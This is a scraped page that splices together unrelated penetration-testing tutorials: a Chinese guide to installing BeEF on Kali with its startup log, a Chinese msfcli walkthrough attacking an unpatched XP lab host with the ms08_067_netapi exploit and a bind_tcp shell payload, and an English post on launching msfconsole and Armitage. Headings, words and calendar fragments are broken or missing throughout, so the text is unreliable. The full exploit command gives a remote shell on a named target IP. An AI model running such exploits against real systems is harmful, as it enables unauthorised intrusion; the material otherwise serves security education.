kali Linux系列教程之BeFF安装与集成Metasploit
kali Linux&系列教程之&BeFF&安装与集成&Metasploit
1.1 apt-get&安装方式
1.3&基本测试
1.4&异常信息
1.5&从源码安装&BeEF
1.5.1&安装&curl git
1.5.2&安装&rvm
1.5.3&安装依赖项
1.5.4&安装&ruby
1.5.5&安装&bundler
1.5.6&下载&beef
1.5.7&安装和启动
1.6&集成&metasploit
1.1 apt-get&安装方式
打开终端，输入如下命令：
apt-get install beef-
切换到&BeEF&安装目录。
启动&beef&。
root@kali:/usr/share/beef-# ./beef
显示结果：
[18:46:50][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[18:46:50][*] Browser Exploitation Framework (BeEF) 0.4.4.9-alpha
[18:46:50]&&& |&& Twit: @beefproject
[18:46:50]&&& |&& Site:
[18:46:50]&&& |&& Blog:
[18:46:50]&&& |_& Wiki: /beefproject/beef/wiki
[18:46:50][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[18:46:51][*] BeEF is loading. Wait a few seconds...
[18:46:55][*] 10 extensions enabled.
[18:46:55][*] 196 modules enabled.
[18:46:55][*] 2 network interfaces were detected.
[18:46:55][+] running on network interface: 127.0.0.1
[18:46:55]&&& |&& Hook URL: http://127.0.0.1:3000/hook.js
[18:46:55]&&& |_& UI URL:&& http://127.0.0.1:3000/ui/panel
[18:46:55][+] running on network interface: 192.168.14.132
[18:46:55]&&& |&& Hook URL: http://192.168.14.132:3000/hook.js
[18:46:55]&&& |_& UI URL:&& http://192.168.14.132:3000/ui/panel
[18:46:55][*] RESTful API key: e46ed3a91a9cdfec12cf4b83d43ecb
[18:46:55][*] HTTP Proxy: http://127.0.0.1:6789
[18:46:55][*] BeEF server started (press control+c to stop)
[1]&&&&&&&&&&
【声明】:黑吧安全网()登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱，我们会在最短的时间内进行处理。
上一篇：【】【】玩转Metasploit系列（第三集）
Metasploit中提供了各种各样的接口。当然，各个接口程序都有他们各自的优点和缺点。接下来，我要对Metasploit中所有的接口程序做解释和实验。Metasploit同时也提供了一些exploit和payloads等，同时还要用到数据库做扫描。 我除了查看Metasploit的官方文档之外，也同时查看了网友们的一些评论，并且一一做了实验。以确保这篇文章的正确性。
Msfcli之原理讲解
Msfcli接口程序可以让用户直接利用，而且不用启动msfconsole。这个接口程序可以迅速的对某一操作系统迅速的发动攻击，适合批量化操作或者渗透。这个接口程序有那么几个常用的参数。
-h&查看帮助
S&显示模块信息
P&可用的payloads
T&攻击目标
E&开始执行
一般情况下，打开命令行窗口，输入&msfcli -h&就可以查看Msfcli的帮助信息。但是在我操作的时候遇到了特殊情况。大概意思就是msfcli已经被metasploit官方团队弃用了，建议直接使用msfconsole。Msfcli在日的时候会被metasploit官方团队移除。但是依然可以使用，不用管那么多。
这里有一篇文章解释了-h里面的参数。
Mode&&&&&&&&&&&Description
&-&&&&&&&&&&&&&&&
(A)dvanced&&&&&Show&available&advanced&options&for&this&module&＃显示该模块的高级选项
(AC)tions&&&&&&Show&available&actions&for&this&module&＃显示该模块的详细设置操作选项
(C)heck&&&&&&&&Run&the&check&routine&of&the&selected&module&＃运行选择的模块进行检测
(E)xecute&&&&&&Execute&the&selected&module&&＃执行选择的模块
(H)elp&&&&&&&&&You&re&looking&at&it&baby!&&＃显示msfcli的帮助信息
(I)DS&Evasion&&Show&available&ids&evasion&options&for&this&module&&＃显示该模块的ids
(M)issing&&&&&&Show&empty&required&options&for&this&module&＃查看必须的操作选项有哪些没有设置
(O)ptions&&&&&&Show&available&options&for&this&module&＃查看可用的选项
(P)ayloads&&&&&Show&available&payloads&for&this&module&#查看模块可用的payload模块
(S)ummary&&&&&&Show&information&about&this&module&&&＃显示该模块的详细信息
(T)argets&&&&&&Show&available&targets&for&this&exploit&module&&＃显示该溢出模块针对的目标类型
下面来说一下这些主要的参数吧。请大家注意看我的截图，因为所有的指令例子都在截图里面。
S就是show的开头字母大写。这个参数一般用来说明一些利用模块的信息
O就是option的开头字母大写。这个参数的主要目的是查看利用模块的详细选项和选项的说明。
P是payload的开头字母大写，其主要目的就是列出这个利用模块可以利用哪些payload。
T则是显示可以攻击的类型。比如这个模块如果利用了这个payload，那么究竟可以攻击哪些系统。而T就是显示出可以攻击的系统类型。
这里需要注意了！msfcli里面的O参数在不同的位置，得出的结果也不同。前面加O参数是exploit的选项。如果你选择了payload之后再加上O参数，得到的则是payload和exploit的选项！我的建议是在选择完payload后再使用O参数，避免太过麻烦。
E就是exploit的开头字母大写，意思就是执行。剩下的只需要设置好通过O参数得到的设置信息，同时也选择好T参数得到的选项。再在末尾加上E，然后回车就可以了。
下面我将会来演示一个实战来证明上面这些参数是否可用。
??Msfcli之实战??
我在上配置好了一个没有打补丁的XP系统，系统版本是SP3，语言是英文。我打算利用ms08_067_netapi利用模块对这个XP系统进行。
查看ms08_067_netapi模块的详细信??息
首先先打开??kali，同时打开终端。直接输入下面的指令查看这个模块的详细信息。
msfcli&/smb/ms08_067_netapi&S
大家有没有发现，这些详细信息里面已经有了这个利用模块的选项信息和攻击目标的信息，甚至还提供了payload的信息?，但是payload的信息不太完全，我还要获取payload的名称等信息。而且还要得到payload的选项。
查看ms08_067_netapi可以加载的负荷或者payload
继续在终端里输入以下指令：
msfcli&windows/smb/ms08_067_netapi&P
之后会列出这个利用模块可以加载的?payload的名称，和这些payload的描述。我决定用windows/shell/bind_tcp这个payload
因为在S参数的已经列出了T参数，所以接下来我就不再使用T参数，而是直接查看payload的选项。
msfcli&windows/smb/ms08_067_netapi&payload=windows/shell/bind_tcp&target=0&O
万事俱备，只欠东风！现在只要把payload的设置信息填写一下，再加上E，然后回车就可以成功渗透那台XP系统。那台XP系统的IP地址是192.168.117.128。而我们只需要用到payload的选项。
输入以下指令后就可以得到XP系统的administrator权限
msfcli&windows/smb/ms08_067_netapi&payload=windows/shell/bind_tcp&target=0&RHOST=192.168.117.128&LPORT=4444&E
成功渗透进了XP页面。2016年二月
891011121314
15161718192021
22232425262728
最近访客友情博客How to run metasploit and armitage on Kali Linux
Metasploit
Metasploit, the great exploitation tool is included in Kali linux along with its powerful frontend armitage. Both are easy to run by clicking from the Kali Linux menu. Will show you the steps in this post, if you are new to it.
Metasploit has a command line interface called msfconsole, and a web interface too. To run msfconsole or armitage first start the metasploit pro service. To do that just click on the menu option Kali Linux > System Services > Metasploit > community / pro start. This will start the metasploit web and rpc servers and also setup the database and its users, when running for the first time.
The output would look something like this.
[ ok ] Starting PostgreSQL 9.1 database server: main.
Configuring Metasploit...
Creating metasploit database user 'msf3'...
Creating metasploit database 'msf3'...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
root@kali:~#
On the first run, it would configure metasploit by creating the database and its users for metasploit. From next run onwards it will just start the postgresql server and the metasploit server.
So remember to start the metasploit pro service everytime before using msfconsole or armitage.
The database credentials are stored in the following file
/opt/metasploit/apps/pro/ui/config/database.yml
Launch msfconsole
Now start msfconsole by typing it in the terminal.
root@kali:~# msfconsole
+-------------------------------------------------------+
METASPLOIT by Rapid7
+---------------------------+---------------------------+
__________________
==c(______(o(______(_()
| |&&&&&&&&&&&&|======[***
| |_____________\_______
| |==[msf &]============\
| |______________________\
// RECON \\
| \(@)(@)(@)(@)(@)(@)(@)/
*********************
+---------------------------+---------------------------+
\'\/\/\/'/
| |^^^^^^^^^^^^^^|l___
|&&\___, |
| |________________|__|)__| |
| |(@)(@)&&&**|(@)(@)**|(@) |
= = = = = = = = = = = =
'--------------'
+---------------------------+---------------------------+
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- type 'go_pro' to launch it now.
=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1068 exploits - 670 auxiliary - 179 post
+ -- --=[ 277 payloads - 29 encoders - 8 nops
Check the database status by running 'db_status'.
msf & db_status
[*] postgresql connected to msf3
Now that metasploit is connected to the database searches of all kind should be fast.
Metasploit web interface
Metasploit also got a web interface which runs on port 3790. It can be accessed at the following url
The web interface requires you to register on metasploit website and get a product/license key. Two editions of the license are currently available, community and pro.
Armitage is a java based gui frontend to metasploit that has a bunch of additional features too. Now that metasploit service is running, its easy to launch armitage as well. Just click from the menu Kali Linux > Exploitation Tools > Network Exploitation > armitage.
Or just type armitage in the terminal and hit enter.
It will popup a dialog box asking for the connection credentials. You do not need to change anything here unless you have configured things differently. Just click 'Connect'.
Next it would ask to start Metasploit RPC server. Click 'Yes'. The metasploit rpc server starts on port number 55553. Then a progress box would come up which will take a little bit of time, so just wait. Within a minute or two, armitage would start and the window would come up.
Make sure to first start metasploit pro service, because it starts postgresql database server. Without it armitage would not start.
Subscribe to get updates delivered to your inbox
Related Posts
About Silver Moon
Php developer, blogger and Linux enthusiast.
He can be reached at .
Or find him on
Connect with us
Other interesting stuff
Copyright & 2016 BinaryTides